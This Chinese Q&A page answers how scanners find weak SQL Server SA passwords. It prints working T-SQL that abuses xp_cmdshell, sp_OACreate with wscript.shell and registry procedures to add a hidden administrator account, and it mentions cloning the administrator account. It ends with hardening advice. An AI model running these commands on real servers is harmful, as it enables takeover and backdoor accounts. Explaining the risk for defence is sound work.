问答文章1 问答文章501 问答文章1001 问答文章1501 问答文章2001 问答文章2501 问答文章3001 问答文章3501 问答文章4001 问答文章4501 问答文章5001 问答文章5501 问答文章6001 问答文章6501 问答文章7001 问答文章7501 问答文章8001 问答文章8501 问答文章9001 问答文章9501

扫描器是根据什么识别弱口令的

发布网友 发布时间:2022-04-28 12:25

我来回答

2个回答

热心网友 时间:2022-05-03 21:10

SQL

存储过程是存储在SQLServer中的预先写好的SQL语句集合,其中危险性最高的扩展存储过程就是xp_cmdshell了,它可以执行操作系统的任何指令,而SA是Microsoft SQLServer的管理员帐号,拥有最高权限,它可以执行扩展存储过程,并获得返回值,比如执行:

exec master..xp_cmdshell 'net user test 1234 /add'和exec master..xp_cmdshell 'net
localgroup administrators test /add'

这样对方的系统就被添加了一个用户名为test,密码为1234,有管理员权限的用户,如图一所示。

现在你应该明白为什么得到SA密码,就可以得到系统的最高权限了吧。而往往不少网络管理员不清楚这个情况,为自己的SA用户起了一些诸如1234,4321等简单的密码,甚至根本就不设置密码,这样网络入侵者就可以利用一些黑客工具很轻松的扫描到SA的密码,进而控制计算机。

除了xp_cmdshell,还有一些存储过程也有可能会被入侵者利用到:

1、xp_regread(这个扩展存储过程可以读取注册表指定的键里指定的值),使用方法(得到机器名):

DECLARE @test varchar(50)
EXEC master..xp_regread @rootkey='HKEY_LOCAL_MACHINE',
@key='system\controlset001\control\computername\computername',
@value_name='computername',
@value=@test OUTPUT
SELECT @test

2、xp_regwrite(这个扩展存储过程可以写入注册表指定的键里指定的值),使用方法(在键HKEY_LOCAL_MACHINE\SOFTWARE\aaa\aaaValue写入bbb):

EXEC master..xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\aaa',
@value_name='aaaValue',
@type='REG_SZ',
@value='bbb'

如果被入侵的计算机的administrator用户可以浏览注册表中的HKEY_LOCAL_MACHINE\SAM\SAM\信息,那使用xp_regread、xp_regwrite这两个存储过程可以实现克隆administrator用户,得到管理员权限。xp_regdeletekey、xp_regdeletevalue也会对系统带来安全隐患。
3、OLE相关的一系列存储过程,这系列的存储过程有sp_OACreate,sp_OADestroy,sp_OAGetErrorInfo,sp_OAGetProperty,sp_OAMethod,sp_OASetProperty,sp_OAStop,使用方法:

DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT
EXEC SP_OAMETHOD @shell,'run',null, 'c:\WINNT\system32\cmd.exe /c net user test
1234 /add'--

这样对方系统增加了一个用户名为test,密码为1234的用户,再执行:

DECLARE @shell INT EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT
EXEC SP_OAMETHOD @shell,'run',null, 'c:\WINNT\system32\cmd.exe /c net localgroup
administrators test /add '--

用户test,被加入管理员组。
解决办法:给SA起个足够复杂的密码,使网络攻击者很难破解出来。为了保险,我们还要到在SQLServer的查询分析器中使用存储过程sp_dropextendedproc删除xp_cmdshell等存储过程,需要时再使用sp_addextendedproc恢复即可,具体操作可以在SQLServer中查询sp_dropextendedproc和sp_addextendedproc的使用帮助,需要注意一点的是删除OLE相关系列的存储过程,可能会造成企业管理器中的某些功能无法使用,这里笔者不建议删除。

既然我们知道了SP_OACREATE的使用方法,那我们就可以到\WINNT\system32下找到cmd.exe,net.exe和net1.exe这三个文件,在“属性”—“安全”中把可以对他们访问的用户全部删除掉,这样就无法使用SP_OACREATE来增加系统用户了,在我们需要访问这些文件的时候再加上访问用户就可以了。

热心网友 时间:2022-05-03 22:28

只会用工具,这倒是没研究过……

去黑客论坛看看,也许会有的!
声明声明:本网页内容为用户发布,旨在传播知识,不代表本网认同其观点,若有侵权等问题请及时与本网联系,我们将在第一时间删除处理。E-MAIL:11247931@qq.com
U盘更新专用需要电脑打开怎么让我的U盘和电脑文件夹同步更新啊_百度知 ... 为什么我的硬盘一打开就弹出对话框说选择打开方式. 倒霉的是右键也打... 磁盘右键是打开方式怎么办 我双机盘符总是打开 打开方式 让我选择,右健第一项是打开.不知道是中了... 罗技Lightspeed怎么用? 罗技无线鼠标怎么样?怎么连接电脑使用? 为什么不建议去融资公司上班 融资担保公司一般账务处理及所涉及的会计科目有哪些 月经期间可以游泳吗 经期能不能游泳 求ftp密码扫描器 增值税发票密码扫描器什么样的好 求一个QQ密码扫描器,只是找回自己的密码 求qq密码扫描器 黑客常的伎俩有哪些? QQ密码被盗怎么办?怎么才能自己QQ密码更保险,防止密码扫描器的扫描? 下载无线网密码扫描器 如何使用CSS3实现圆角表格 excel 查找姓名 excel中快速查找姓名 精品名片(布纹纸、荷兰白、白水纹、细条纹、白滑影、星彩、珠滑影、白滨沙) 另:印刷高档画册,宣传彩页 刚成立的一个物流公司应该如何开展业务 物流怎么找货源呢? 快递员如何开发客户 怎么样做好物流业务员??? 怎样申请快递 物流专线如何设立 如何开好快递店 物流名片设计什么地方可以做档次高的 顺丰的快递名片怎么设计才好看 QQ密码扫描器有人有没? X弱口令扫描器怎么用 详细的南京二日游路线有啥? 谁告诉我流光扫描器的安装密码啊 135端口s扫描器+ADSL密码查看器 南京两日游最佳路线 什么扫描软件可以识别系统及用户密码 南京二日游的最佳路线? 如何微信扫描密码 南京周边适合的两日游? 能扫描到用户名和弱口令的扫描器 是哪种 SA口令扫描器 过几天要去南京 有没有什么景点适合两日游的 最好有详细路线,路痴啊 密码字典怎么用啊 是不是要安装在XXX路径啊 是不是要配合扫描器用啊 那生成的密码在那呢 我是菜鸟啊 南京二日游该怎么安排?去哪些景点,吃哪些小吃? 怎样阻止扫描器探测sql的帐号和密码信息 南京两日游,可以去哪些地方 求南京二日游攻略 南京二日游怎样安排线路? 股票什么是压力位